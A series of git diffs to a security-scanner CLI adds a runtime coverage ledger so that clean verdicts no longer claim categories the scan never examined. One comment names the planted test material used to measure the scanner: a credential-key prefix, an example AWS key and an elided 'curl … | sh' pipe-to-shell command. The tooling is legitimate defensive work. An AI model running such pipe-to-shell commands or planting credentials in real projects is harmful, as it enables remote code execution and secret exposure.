+    const isAbsentSurface = (c: CategoryCoverage): boolean => c.observedAbsent === true;
     const notExaminedAbsent = notExamined.filter(isAbsentSurface);
     const notExaminedGaps = notExamined.filter(c => !isAbsentSurface(c));
     // HMA-2: prefer registry.packageType (authoritative) over the local
@@ -1452,7 +1464,8 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
       : null;
     // A category can only be reported CLEAR if a check in it actually read a
     // file inside the target. `buildCategorySummaries` seeds all 25 labels
-    // `clear: true` from the taxonomy before it looks at a single finding, so
+    // `clear: true` from the renderer's own ALL_CATEGORY_LABELS before it
+    // looks at a single finding, so
     // on its own it reports "clear" for categories the run never examined.
     // Measured on a 529-file repo carrying a planted credential: 13 of the 25
     // were never examined, and all 25 printed under "(all clear)".
@@ -1578,7 +1591,7 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     // stopped at 200". Say which one it is.
     if (nanomindScan?.compileSetTruncated && localScan?.coverage) {
       surfacesLine.value +=
-        ` (semantic pass capped at ${semanticCount}; ${localScan.coverage.filesExamined} files read in total)`;
+        ` (semantic pass capped at ${semanticCount}; ${localScan.coverage.filesExamined} file${localScan.coverage.filesExamined === 1 ? '' : 's'} read in total)`;
       surfacesLine.tone = 'warning';
     }
 
@@ -1616,9 +1629,14 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     if (coverageCategories && localScan?.coverage) {
       const execs = localScan.coverage.executions;
       const ran = execs.filter(e => e.completed).length;
+      // Denominator is the REGISTERED check set, not the records that happen
+      // to exist. Sizing it from `executions.length` made a check that never
+      // registered vanish from both halves, so the ratio always read `N of N`
+      // and could not express a missing check at all.
+      const registered = Object.keys(CHECK_METHOD_PREFIXES).length;
       const parts = [
         `${staticCount} static declared`,
-        `${ran} of ${execs.length} check groups ran`,
+        `${ran} of ${registered} check groups ran`,
       ];
       if (UNREACHABLE_PREFIXES.length > 0) {
         parts.push(`${UNREACHABLE_PREFIXES.length} unreachable`);
@@ -1650,8 +1668,8 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
         `  ${colors.dim}${'Coverage'.padEnd(LABEL_WIDTH, ' ')}${RESET()}${covTone}${tally.join(' · ')}${RESET()}`,
       );
 
-      // Name them. `Not examined` is exactly LABEL_WIDTH, so padEnd would
-      // leave no separator and the label would run into the value.
+      // Name them on their own lines. Labels stay under LABEL_WIDTH so
+      // padEnd always leaves a separator before the value.
       const nameLine = (label: string, cats: CategoryCoverage[], tone: string): void => {
         if (cats.length === 0) return;
         const shown = verbose ? cats : cats.slice(0, 8);
@@ -4356,15 +4374,19 @@ Examples:
                   ...(nmResult.compiledArtifacts > 0
                     ? {
                         semantic: {
-                          prefixes: [...SEMANTIC_PREFIXES],
+                          artifactTypes: (nmResult.artifactSummaries ?? []).map(a => a.type),
                           artifactsCompiled: nmResult.compiledArtifacts,
                         },
                       }
                     : {}),
+                  // Same predicate the rendered block uses, so the text and
+                  // the JSON cannot disagree about which categories a finding
+                  // proves were examined.
                   observedCheckIds: result.findings
-                    .filter(f => !f.passed)
+                    .filter(f => countsAgainstScore(f))
                     .map(f => f.checkId)
                     .filter(Boolean),
+                  filesReadByCategory: result.coverage.filesReadByCategory,
                 },
               ),
               // Checks whose implementation exists but has no caller, so they

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -142,6 +142,13 @@ async function finishWithFindings(code: number): Promise<void> {
 // Per-invocation start times keyed by subcommand name (preAction → postAction).
 const telemetryStartedAt = new Map<string, number>();
 import { getTaxonomyMap, getCheckCounts } from './hardening/taxonomy';
+import {
+  summarizeCoverage,
+  SEMANTIC_PREFIXES,
+  UNREACHABLE_PREFIXES,
+  type CategoryCoverage,
+} from './hardening/coverage-ledger';
+import type { ScanResult } from './hardening/security-check';
 import { compareFindingsByTier } from './ui/finding-tier';
 import {
   scoreLineLabel,
@@ -745,12 +752,16 @@ interface UnifiedCheckDisplayOptions {
      * assert it. Absolute path; rendered escaped.
      */
     ownArchivePath?: string;
+    /** What the scan actually examined, measured at runtime. */
+    coverage?: ScanResult['coverage'];
   };
   registry?: RegistryTrustData | null;
   verbose?: boolean;
   version?: string;
   nanomindScan?: {
     compiledArtifacts: number;
+    /** True when the semantic compile set hit its 200-file cap. */
+    compileSetTruncated?: boolean;
     findings: Array<{ severity: string; checkId?: string; description?: string; name?: string; message?: string; fix?: string; guidance?: string; file?: string; line?: number; passed?: boolean; attackClass?: string; category?: string }>;
   };
   /** Per-artifact summaries for the Observations block. Skill/MCP/SOUL/A2A
@@ -1234,7 +1245,23 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
   const meta: string[] = [typeLabel];
   if (version) meta.unshift(`v${version}`);
   if (sourceLabel) meta.push(sourceLabel);
-  if (nanomindScan) meta.push(`${nanomindScan.compiledArtifacts} files analyzed`);
+  if (nanomindScan) {
+    // `compiledArtifacts` is the semantic layer's compile count, and that
+    // layer stops at a 200-file cap. Printed bare as "200 files analyzed" it
+    // reads as the size of the scan; on a 528-file repo it was the cap, and
+    // adding a file to the tree did not move it. Name it as a cap when it is
+    // one, and prefer the measured read count when the ledger has it.
+    if (nanomindScan.compileSetTruncated) {
+      const read = localScan?.coverage?.filesExamined;
+      meta.push(
+        read !== undefined
+          ? `${read} files read · semantic capped at ${nanomindScan.compiledArtifacts}`
+          : `semantic capped at ${nanomindScan.compiledArtifacts} files`,
+      );
+    } else {
+      meta.push(`${nanomindScan.compiledArtifacts} files analyzed`);
+    }
+  }
   if (localScan?.filesScanned) meta.push(`${localScan.filesScanned} files scanned`);
 
   console.log();
@@ -1347,6 +1374,59 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     const staticCount = getCheckCounts().static;
     const semanticCount = nanomindScan?.compiledArtifacts ?? 0;
     const filesScanned = localScan?.filesScanned;
+
+    // Measured coverage for this run. `undefined` when the caller supplied no
+    // ledger (the `check` quick-scan path, and any embedder calling the
+    // display helper directly) — in that case the lines below fall back to
+    // their previous behaviour rather than assert a coverage claim built from
+    // nothing.
+    const coverageCategories = localScan?.coverage
+      ? summarizeCoverage(
+          localScan.coverage.executions,
+          // A capped semantic pass truncates every category it credits. This
+          // is the case that matters most: the semantic layer is the only one
+          // that reads arbitrary source, so when its 200-file walk stops
+          // early, `credentials` is examined for the files it reached and
+          // blind to the rest — and a planted key in file 201 goes unseen
+          // while the category still reports clear. Registering the cap here
+          // is what turns those categories into `partial`.
+          nanomindScan?.compileSetTruncated
+            ? [
+                ...localScan.coverage.truncations,
+                {
+                  layer: 'semantic',
+                  cap: semanticCount,
+                  prefixes: [...SEMANTIC_PREFIXES],
+                  reason:
+                    `semantic pass capped at ${semanticCount} files — source beyond the cap was not compiled`,
+                },
+              ]
+            : localScan.coverage.truncations,
+          {
+            ...(semanticCount > 0
+              ? { semantic: { prefixes: [...SEMANTIC_PREFIXES], artifactsCompiled: semanticCount } }
+              : {}),
+            // A reported finding proves its category was examined.
+            observedCheckIds: failed.map(f => f.checkId).filter(Boolean),
+          },
+        )
+      : undefined;
+    // Categories with no executed check. These are what used to print inside
+    // "(all clear)"; they now print as `not examined`, each with its reason.
+    const notExamined = (coverageCategories ?? []).filter(c => c.state === 'not-examined');
+    // Categories a cap stopped short of the whole tree.
+    const partiallyExamined = (coverageCategories ?? []).filter(c => c.state === 'truncated');
+
+    // Not every unexamined category is a gap. A repo with no MCP config has
+    // nothing for the MCP checks to read, and saying so is information, not a
+    // warning — flagging it would be the shame-shaped inverse of the bug being
+    // fixed here. A cap, a depth skip, or a check with no caller ARE gaps:
+    // there was something to look at and the scan did not look. Only the
+    // second kind qualifies the verdict.
+    const isAbsentSurface = (c: CategoryCoverage): boolean =>
+      (c.reason ?? '').includes('no file of this kind');
+    const notExaminedAbsent = notExamined.filter(isAbsentSurface);
+    const notExaminedGaps = notExamined.filter(c => !isAbsentSurface(c));
     // HMA-2: prefer registry.packageType (authoritative) over the local
     // project-type heuristic. Fixes "Surfaces: cli" (HMA local heuristic)
     // disagreeing with "library" (ai-trust → registry packageType) on
@@ -1370,9 +1450,27 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
           fullAuditTarget: quickScan.fullAuditTarget,
         })
       : null;
+    // A category can only be reported CLEAR if a check in it actually read a
+    // file inside the target. `buildCategorySummaries` seeds all 25 labels
+    // `clear: true` from the taxonomy before it looks at a single finding, so
+    // on its own it reports "clear" for categories the run never examined.
+    // Measured on a 529-file repo carrying a planted credential: 13 of the 25
+    // were never examined, and all 25 printed under "(all clear)".
+    //
+    // The clear buckets are therefore filtered down to the categories the
+    // ledger measured as examined. Buckets WITH findings are never filtered —
+    // a finding is itself proof the category was examined, and dropping one
+    // would hide a real result.
+    const coverageByCategory = new Map(
+      (coverageCategories ?? []).map(c => [c.category, c]),
+    );
     const categorySummaries = quickScanDisclosure
       ? allCategorySummaries.filter(c => !c.clear)
-      : allCategorySummaries;
+      : coverageCategories
+        ? allCategorySummaries.filter(
+            c => !c.clear || coverageByCategory.get(c.name)?.state === 'examined',
+          )
+        : allCategorySummaries;
     const verdictLine = buildVerdict(
       { critical, high, medium, low },
       { kind, filesScanned, remote: opts.remote === true },
@@ -1399,6 +1497,20 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     const { artifacts: reconciledArtifacts, suppressed: suppressedIntents } =
       reconcileArtifactIntents(opts.artifactSummaries ?? [], failed);
 
+    // The renderer prints `0 skipped` whenever it is handed no skip list, and
+    // hackmyagent never handed it one — so `0 skipped` was emitted on every
+    // scan regardless of what ran. Feeding it the measured not-examined
+    // categories makes the number the truth instead of a constant.
+    //
+    // Verbose lists them all; the default view names the first four and counts
+    // the rest, so the line stays legible. Every entry carries its reason —
+    // a bare `not examined` list is a dead end.
+    // The renderer's `skipped` channel formats every entry inline, so passing
+    // 17 categories produced a 500-character Checks line. The count and the
+    // detail are therefore split: the Checks line below is rewritten with the
+    // true totals, and the names go on their own line and into `--json`. No
+    // truncated list is ever handed to the renderer — it derives its number
+    // from the array length, so a short list would print a short count.
     const { lines, artifactLines } = renderObservationsBlock({
       surfaces: { kind, filesScanned, artifactsCompiled: semanticCount, remote: opts.remote === true },
       checks: { staticCount, semanticCount },
@@ -1459,9 +1571,109 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
       }
     }
 
+    // The Surfaces line prints `compiledArtifacts` as "N semantic artifacts",
+    // and the header above prints the same number as "N files analyzed". When
+    // the semantic walk hit its 200-file cap that number IS the cap, so
+    // unqualified it reads as "we looked at 200 files" when it means "we
+    // stopped at 200". Say which one it is.
+    if (nanomindScan?.compileSetTruncated && localScan?.coverage) {
+      surfacesLine.value +=
+        ` (semantic pass capped at ${semanticCount}; ${localScan.coverage.filesExamined} files read in total)`;
+      surfacesLine.tone = 'warning';
+    }
+
+    // A clean result over incomplete coverage is not a clean bill of health.
+    // `buildVerdict` says "No security issues detected. This library looks
+    // safe to use." whenever the findings list is empty — it has no way to
+    // know the run never looked at 8 categories and stopped 300 files short.
+    // Measured: that exact sentence printed over a planted `sk-ant-api03-`
+    // key. Same treatment as the #200 quick-scan disclosure: name the gap and
+    // drop the green tone, since green is what made it read as an all-clear.
+    if (
+      coverageCategories &&
+      totalFindings === 0 &&
+      (notExaminedGaps.length > 0 || partiallyExamined.length > 0)
+    ) {
+      const gaps: string[] = [];
+      if (partiallyExamined.length > 0) {
+        gaps.push(`${partiallyExamined.length} stopped at a file cap`);
+      }
+      if (notExaminedGaps.length > 0) {
+        gaps.push(`${notExaminedGaps.length} did not run`);
+      }
+      verdictDisplay.value =
+        `No issues in what was examined — but ${gaps.join(' and ')}. ` +
+        `This is not a clean bill of health for the whole target.`;
+      verdictDisplay.tone = 'warning';
+    }
+
+    // Rewrite the Checks line from what RAN. The renderer sizes it from
+    // `getCheckCounts()`, i.e. the configured taxonomy, so `310 static · 0
+    // skipped` was printed identically whether the checks reached the tree or
+    // not. `310` stays on the line — the reader needs it to size the gap —
+    // but it is now labelled as the declared suite and stood next to the
+    // number that actually executed.
+    if (coverageCategories && localScan?.coverage) {
+      const execs = localScan.coverage.executions;
+      const ran = execs.filter(e => e.completed).length;
+      const parts = [
+        `${staticCount} static declared`,
+        `${ran} of ${execs.length} check groups ran`,
+      ];
+      if (UNREACHABLE_PREFIXES.length > 0) {
+        parts.push(`${UNREACHABLE_PREFIXES.length} unreachable`);
+      }
+      parts.push(`${semanticCount} semantic (NanoMind AST)`);
+      // Labelled by layer: the semantic count above is the compile set, and
+      // an unlabelled smaller number beside it reads as a contradiction.
+      parts.push(`${localScan.coverage.filesExamined} file${localScan.coverage.filesExamined === 1 ? '' : 's'} read by static checks`);
+      checksLine.value = parts.join(' · ');
+    }
+
     for (const line of [surfacesLine, checksLine]) {
       const labelPad = line.label.padEnd(LABEL_WIDTH, ' ');
       console.log(`  ${colors.dim}${labelPad}${RESET()}${toneColor(line.tone)}${line.value}${RESET()}`);
+    }
+
+    // The coverage tally, then the names. This is what the "(all clear)" tail
+    // used to swallow: on a 529-file repo, 17 of the 25 categories sat inside
+    // "(all clear)" having either examined nothing or stopped at a file cap.
+    if (coverageCategories) {
+      const examinedCount = coverageCategories.filter(c => c.state === 'examined').length;
+      const tally = [`${examinedCount} of ${coverageCategories.length} categories fully examined`];
+      if (partiallyExamined.length > 0) tally.push(`${partiallyExamined.length} partial (file cap)`);
+      if (notExaminedGaps.length > 0) tally.push(`${notExaminedGaps.length} did not run`);
+      if (notExaminedAbsent.length > 0) tally.push(`${notExaminedAbsent.length} no such surface here`);
+      // Yellow only for real gaps. An absent surface is information.
+      const covTone = notExaminedGaps.length > 0 || partiallyExamined.length > 0 ? colors.yellow : colors.dim;
+      console.log(
+        `  ${colors.dim}${'Coverage'.padEnd(LABEL_WIDTH, ' ')}${RESET()}${covTone}${tally.join(' · ')}${RESET()}`,
+      );
+
+      // Name them. `Not examined` is exactly LABEL_WIDTH, so padEnd would
+      // leave no separator and the label would run into the value.
+      const nameLine = (label: string, cats: CategoryCoverage[], tone: string): void => {
+        if (cats.length === 0) return;
+        const shown = verbose ? cats : cats.slice(0, 8);
+        const hidden = cats.length - shown.length;
+        const more = hidden > 0 ? ` + ${hidden} more (--verbose)` : '';
+        console.log(
+          `  ${colors.dim}${label.padEnd(LABEL_WIDTH, ' ')}${RESET()}` +
+          `${tone}${shown.map(c => c.category).join(', ')}${more}${RESET()}`,
+        );
+      };
+      // The real gaps get their own line and the warning colour; absent
+      // surfaces get a separate, quieter one so the two are never conflated.
+      nameLine('Did not run', notExaminedGaps, colors.yellow);
+      nameLine('Not present', notExaminedAbsent, colors.dim);
+      // One reason per category under verbose — the lines above name WHAT was
+      // not covered, this says WHY, so neither is a dead end.
+      if (verbose) {
+        for (const c of [...notExamined, ...partiallyExamined]) {
+          const tag = c.state === 'truncated' ? `${c.category} (partial)` : c.category;
+          console.log(`  ${' '.repeat(LABEL_WIDTH)}${colors.dim}${tag} — ${c.reason ?? 'not examined'}${RESET()}`);
+        }
+      }
     }
 
     if (artifactLines.length > 0) {
@@ -4116,8 +4328,55 @@ Examples:
           }
         }
 
+        // Coverage inventory. `--json` used to carry findings ONLY, so a
+        // caller could not tell "ran 310 checks and found nothing" from "ran
+        // the checks that cannot fire here" — which makes the rule that a
+        // clean result with no evidence of instrumentation is an unrun check
+        // unenforceable by any automated gate. The rollup is emitted
+        // alongside the raw records so a consumer gets the same category
+        // states the CLI renders without reimplementing them.
+        const jsonCoverage = result.coverage
+          ? {
+              ...result.coverage,
+              categories: summarizeCoverage(
+                result.coverage.executions,
+                nmResult.compileSetTruncated
+                  ? [
+                      ...result.coverage.truncations,
+                      {
+                        layer: 'semantic',
+                        cap: nmResult.compiledArtifacts,
+                        prefixes: [...SEMANTIC_PREFIXES],
+                        reason:
+                          `semantic pass capped at ${nmResult.compiledArtifacts} files — source beyond the cap was not compiled`,
+                      },
+                    ]
+                  : result.coverage.truncations,
+                {
+                  ...(nmResult.compiledArtifacts > 0
+                    ? {
+                        semantic: {
+                          prefixes: [...SEMANTIC_PREFIXES],
+                          artifactsCompiled: nmResult.compiledArtifacts,
+                        },
+                      }
+                    : {}),
+                  observedCheckIds: result.findings
+                    .filter(f => !f.passed)
+                    .map(f => f.checkId)
+                    .filter(Boolean),
+                },
+              ),
+              // Checks whose implementation exists but has no caller, so they
+              // are counted in the advertised suite and can never fire.
+              unreachableCheckPrefixes: [...UNREACHABLE_PREFIXES],
+              semanticCompileSetTruncated: nmResult.compileSetTruncated === true,
+            }
+          : undefined;
+
         const jsonBase = {
           ...result,
+          ...(jsonCoverage ? { coverage: jsonCoverage } : {}),
           ...(nmResult.analystFindings?.length ? { analystFindings: nmResult.analystFindings } : {}),
           ...(nmResult.analystEscalations?.length ? { analystEscalations: nmResult.analystEscalations } : {}),
           ...(nmResult.coverageSweep ? { coverageSweep: nmResult.coverageSweep } : {}),
@@ -4303,6 +4562,11 @@ Examples:
           // `Verdict  Usable with caveats.` — the #259 incoherence again,
           // with the number and the words swapped.
           findings: result.findings.filter((f) => !f.fixed || f.fixVerified === false),
+          // Measured coverage for this run. Without it the Observations block
+          // falls back to deriving its claim from the configured check set,
+          // which is what printed "(all clear)" over categories nothing
+          // examined.
+          coverage: result.coverage,
         },
         // Without this, the Observations "Checks" line renders "0 semantic"
         // even though the pre-scan status reports N artifacts compiled.
@@ -4311,6 +4575,8 @@ Examples:
         // Observations block can count semantic checks separately.
         nanomindScan: nmResult.compiledArtifacts > 0 ? {
           compiledArtifacts: nmResult.compiledArtifacts,
+          // Whether that count is a measurement or the 200-file cap.
+          compileSetTruncated: nmResult.compileSetTruncated,
           findings: [],
         } : undefined,
         verbose: !!options.verbose,

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -146,6 +146,7 @@ import {
   summarizeCoverage,
   SEMANTIC_PREFIXES,
   CHECK_METHOD_PREFIXES,
+  categoryForPrefix,
   UNREACHABLE_PREFIXES,
   type CategoryCoverage,
 } from './hardening/coverage-ledger';
@@ -156,6 +157,8 @@ import {
   shouldRenderPathForward,
   quickScanFollowupText,
   quickScanScopeDisclosure,
+  OBSERVATION_LABELS,
+  OBSERVATION_LABEL_WIDTH,
 } from './ui/quick-scan-labels';
 import { reconcileArtifactIntents, rawIntentDisclosureLines } from './ui/artifact-intent';
 import { clampDisclosure, clampScoreToVerdictBand, countsAgainstScore, retainForVerdict } from './ui/verdict-band';
@@ -1404,17 +1407,6 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
               ]
             : localScan.coverage.truncations,
           {
-            // Artifact TYPES the run compiled — measured, unlike the old
-            // blanket credit which upgraded 15 category families from the
-            // single fact that some artifact somewhere compiled.
-            ...(semanticCount > 0
-              ? {
-                  semantic: {
-                    artifactTypes: (opts.artifactSummaries ?? []).map(a => a.type),
-                    artifactsCompiled: semanticCount,
-                  },
-                }
-              : {}),
             // A reported finding proves its category was examined.
             observedCheckIds: failed.map(f => f.checkId).filter(Boolean),
             filesReadByCategory: localScan.coverage.filesReadByCategory,
@@ -1427,18 +1419,19 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     // Categories a cap stopped short of the whole tree.
     const partiallyExamined = (coverageCategories ?? []).filter(c => c.state === 'truncated');
 
-    // Not every unexamined category is a gap. A repo with no MCP config has
-    // nothing for the MCP checks to read, and saying so is information, not a
-    // warning — flagging it would be the shame-shaped inverse of the bug being
-    // fixed here. A cap, a depth skip, or a check with no caller ARE gaps:
-    // there was something to look at and the scan did not look. Only the
-    // second kind qualifies the verdict.
-    // Flag, not a string match: the ledger sets `observedAbsent` only when a
-    // check was seen to look and find nothing. Sniffing the reason text would
-    // reclassify a gap as benign the moment the sentence is reworded.
-    const isAbsentSurface = (c: CategoryCoverage): boolean => c.observedAbsent === true;
-    const notExaminedAbsent = notExamined.filter(isAbsentSurface);
-    const notExaminedGaps = notExamined.filter(c => !isAbsentSurface(c));
+    // What qualifies the verdict is only ever POSITIVELY measured: a cap that
+    // fired, or a check the orchestration explicitly skipped. A category that
+    // simply read nothing is reported in the inventory but does not warn —
+    // a repo with no MCP config has nothing for the MCP checks to read, and
+    // flagging that would be the shame-shaped inverse of the bug being fixed
+    // here. Two earlier cuts tried to tell "absent" from "not attributed" by
+    // inference; both were wrong in both directions, so neither claim is made.
+    const explicitlySkipped = (coverageCategories ?? []).filter(c =>
+      (localScan?.coverage?.executions ?? []).some(
+        e => e.skipReason && (CHECK_METHOD_PREFIXES[e.method] ?? [])
+          .some(p => categoryForPrefix(p) === c.category),
+      ),
+    );
     // HMA-2: prefer registry.packageType (authoritative) over the local
     // project-type heuristic. Fixes "Surfaces: cli" (HMA local heuristic)
     // disagreeing with "library" (ai-trust → registry packageType) on
@@ -1552,7 +1545,7 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
       return '';
     };
     // 11-char label width fits "Categories" + 1 space separator.
-    const LABEL_WIDTH = 12;
+    const LABEL_WIDTH = OBSERVATION_LABEL_WIDTH;
 
     // Emit Surfaces + Checks, then Artifacts block (if any), then
     // Categories + Verdict. Artifacts go between Checks and Categories
@@ -1605,14 +1598,14 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     if (
       coverageCategories &&
       totalFindings === 0 &&
-      (notExaminedGaps.length > 0 || partiallyExamined.length > 0)
+      (explicitlySkipped.length > 0 || partiallyExamined.length > 0)
     ) {
       const gaps: string[] = [];
       if (partiallyExamined.length > 0) {
         gaps.push(`${partiallyExamined.length} stopped at a file cap`);
       }
-      if (notExaminedGaps.length > 0) {
-        gaps.push(`${notExaminedGaps.length} did not run`);
+      if (explicitlySkipped.length > 0) {
+        gaps.push(`${explicitlySkipped.length} were skipped by this scan depth`);
       }
       verdictDisplay.value =
         `No issues in what was examined — but ${gaps.join(' and ')}. ` +
@@ -1658,32 +1651,30 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     // "(all clear)" having either examined nothing or stopped at a file cap.
     if (coverageCategories) {
       const examinedCount = coverageCategories.filter(c => c.state === 'examined').length;
-      const tally = [`${examinedCount} of ${coverageCategories.length} categories fully examined`];
+      const tally = [`${examinedCount} of ${coverageCategories.length} categories examined`];
       if (partiallyExamined.length > 0) tally.push(`${partiallyExamined.length} partial (file cap)`);
-      if (notExaminedGaps.length > 0) tally.push(`${notExaminedGaps.length} did not run`);
-      if (notExaminedAbsent.length > 0) tally.push(`${notExaminedAbsent.length} no such surface here`);
-      // Yellow only for real gaps. An absent surface is information.
-      const covTone = notExaminedGaps.length > 0 || partiallyExamined.length > 0 ? colors.yellow : colors.dim;
+      if (notExamined.length > 0) tally.push(`${notExamined.length} unexamined (read no file)`);
+      // Yellow only for a measured shortfall: a cap that fired or a skip.
+      const covTone = partiallyExamined.length > 0 || explicitlySkipped.length > 0
+        ? colors.yellow : colors.dim;
       console.log(
-        `  ${colors.dim}${'Coverage'.padEnd(LABEL_WIDTH, ' ')}${RESET()}${covTone}${tally.join(' · ')}${RESET()}`,
+        `  ${colors.dim}${OBSERVATION_LABELS.coverage.padEnd(LABEL_WIDTH, ' ')}${RESET()}${covTone}${tally.join(' · ')}${RESET()}`,
       );
 
-      // Name them on their own lines. Labels stay under LABEL_WIDTH so
-      // padEnd always leaves a separator before the value.
-      const nameLine = (label: string, cats: CategoryCoverage[], tone: string): void => {
-        if (cats.length === 0) return;
-        const shown = verbose ? cats : cats.slice(0, 8);
-        const hidden = cats.length - shown.length;
+      // Labels come from OBSERVATION_LABELS, which a test holds under
+      // LABEL_WIDTH. A label of exactly LABEL_WIDTH leaves no separator and
+      // runs into the value — it shipped twice as `Not examinedA2A, …`.
+      // One line, one claim: these categories read no file. No colour-coded
+      // guess about whether that means the surface is absent.
+      if (notExamined.length > 0) {
+        const shown = verbose ? notExamined : notExamined.slice(0, 8);
+        const hidden = notExamined.length - shown.length;
         const more = hidden > 0 ? ` + ${hidden} more (--verbose)` : '';
         console.log(
-          `  ${colors.dim}${label.padEnd(LABEL_WIDTH, ' ')}${RESET()}` +
-          `${tone}${shown.map(c => c.category).join(', ')}${more}${RESET()}`,
+          `  ${colors.dim}${OBSERVATION_LABELS.unexamined.padEnd(LABEL_WIDTH, ' ')}${RESET()}` +
+          `${colors.dim}${shown.map(c => c.category).join(', ')}${more}${RESET()}`,
         );
-      };
-      // The real gaps get their own line and the warning colour; absent
-      // surfaces get a separate, quieter one so the two are never conflated.
-      nameLine('Did not run', notExaminedGaps, colors.yellow);
-      nameLine('Not present', notExaminedAbsent, colors.dim);
+      }
       // One reason per category under verbose — the lines above name WHAT was
       // not covered, this says WHY, so neither is a dead end.
       if (verbose) {
@@ -4371,14 +4362,6 @@ Examples:
                     ]
                   : result.coverage.truncations,
                 {
-                  ...(nmResult.compiledArtifacts > 0
-                    ? {
-                        semantic: {
-                          artifactTypes: (nmResult.artifactSummaries ?? []).map(a => a.type),
-                          artifactsCompiled: nmResult.compiledArtifacts,
-                        },
-                      }
-                    : {}),
                   // Same predicate the rendered block uses, so the text and
                   // the JSON cannot disagree about which categories a finding
                   // proves were examined.

--- a/src/hardening/coverage-ledger.ts
+++ b/src/hardening/coverage-ledger.ts
@@ -1,0 +1,646 @@
+/**
+ * Runtime coverage ledger for `secure`.
+ *
+ * Before this existed, the scan's coverage claim was derived from
+ * `TAXONOMY_MAP` — the CONFIGURED check set — so the Observations block
+ * printed the same three lines whether 310 checks ran against the tree or
+ * none of them did:
+ *
+ *   Checks      310 static · 200 semantic (NanoMind AST) · 0 skipped
+ *   Categories  credentials, MCP, network, injection, ... + 16 more  (all clear)
+ *   Verdict     No security issues detected. This library looks safe to use.
+ *
+ * Measured on a 528-file copy of a real repo carrying a planted
+ * `sk-ant-api03-...` key, an `AKIAIOSFODNN7EXAMPLE`, and a
+ * `curl … | sh`: byte-identical output, `100/100`. That is not a missed
+ * detection — it is a false assurance line, and it is worse than silence
+ * because it invites the reader to record a pass.
+ *
+ * This module replaces configuration with measurement. It records what each
+ * check method ACTUALLY touched inside the target and derives the category
+ * states from that.
+ *
+ * ## The ledger fails closed
+ *
+ * Every category starts `not-examined`. Only positive runtime evidence — a
+ * path inspected INSIDE the target root while a registered check was on the
+ * stack — upgrades it. This direction is deliberate and is the whole safety
+ * property: instrumentation that is missing, wrong, or bypassed makes the
+ * ledger UNDERSTATE coverage. It can never overstate it, which is the
+ * failure mode that produced the defect in the first place.
+ *
+ * Method entry is NOT evidence. A check that runs and reads nothing from the
+ * target examined nothing, and says so.
+ */
+
+import * as path from 'path';
+
+/**
+ * What a scan can honestly say about one category.
+ *
+ * - `examined`     — a check in this category ran AND inspected at least one
+ *                    path inside the target.
+ * - `not-examined` — the fail-closed default. Either no check in the category
+ *                    ran, or every one that ran touched nothing in the target.
+ * - `truncated`    — checks ran and inspected the target, but a cap stopped
+ *                    the layer short of the whole tree, so a clear result
+ *                    covers only the part that was reached.
+ */
+export type CoverageState = 'examined' | 'not-examined' | 'truncated';
+
+/** One registered check method and what it actually did. */
+export interface CheckExecution {
+  /** Scanner method name, e.g. `checkCredentialExposure`. */
+  method: string;
+  /** Check-ID prefixes this method emits, e.g. `['CRED', 'ENVLEAK']`. */
+  prefixes: string[];
+  /** True once the method returned without throwing. */
+  completed: boolean;
+  /** Distinct paths inside the target this method read the CONTENTS of. */
+  filesRead: number;
+  /** Distinct paths inside the target it inspected without reading (stat/readdir). */
+  pathsInspected: number;
+  /** Set when the orchestration skipped the method outright. */
+  skipReason?: string;
+  /** Set when the method threw. A thrower examined nothing it can vouch for. */
+  error?: string;
+}
+
+/** A cap that stopped a layer short of the whole tree. */
+export interface CoverageTruncation {
+  /** Layer that was capped, e.g. `semantic` or `nemo-source`. */
+  layer: string;
+  /** The cap value. */
+  cap: number;
+  /** Prefixes the capped layer covers. */
+  prefixes: string[];
+  /** Human-readable reason, rendered to the user verbatim. */
+  reason: string;
+}
+
+/** Per-category rollup, derived entirely from the records above. */
+export interface CategoryCoverage {
+  /** Category label, matching the renderer's vocabulary. */
+  category: string;
+  state: CoverageState;
+  /** Check methods that ran and inspected something for this category. */
+  methods: string[];
+  /** Distinct files whose contents were read for this category. */
+  filesRead: number;
+  /** Why it is `not-examined` / `truncated`. Empty when `examined`. */
+  reason?: string;
+}
+
+/**
+ * Map from scanner check method to the check-ID prefixes it emits.
+ *
+ * This table declares WHICH category a method's findings belong to. It does
+ * NOT declare that the method ran or that it looked at anything — those are
+ * measured. A wrong entry here mis-files evidence; it cannot manufacture it.
+ *
+ * `__tests__/hardening/coverage-honesty.test.ts` holds this
+ * honest in two directions: every prefix named here must exist in
+ * `TAXONOMY_MAP`, and every `check*` method reached by the orchestration must
+ * appear here. A method added without a registration fails that test rather
+ * than silently reporting its category as never examined.
+ */
+export const CHECK_METHOD_PREFIXES: Readonly<Record<string, readonly string[]>> = {
+  checkCredentialExposure: ['CRED'],
+  checkClaudeMd: ['CLAUDE'],
+  checkMcpConfig: ['MCP'],
+  checkFilePermissions: ['PERM'],
+  checkGitSecurity: ['GIT'],
+  checkNetworkSecurity: ['NET'],
+  checkMcpAdvanced: ['MCP'],
+  checkClaudeAdvanced: ['CLAUDE'],
+  checkCursorConfig: ['CURSOR'],
+  checkVscodeConfig: ['VSCODE'],
+  checkCredentialsAdvanced: ['CRED'],
+  checkPermissionsAdvanced: ['PERM'],
+  checkEnvironmentSecurity: ['ENV'],
+  checkLoggingSecurity: ['LOG'],
+  checkDependencySecurity: ['DEP'],
+  checkAuthSecurity: ['AUTH'],
+  checkProcessSecurity: ['PROC'],
+  checkClaudeExtended: ['CLAUDE'],
+  checkMcpExtended: ['MCP'],
+  checkNetworkExtended: ['NET'],
+  checkIOSecurity: ['IO'],
+  checkAPISecurity: ['API'],
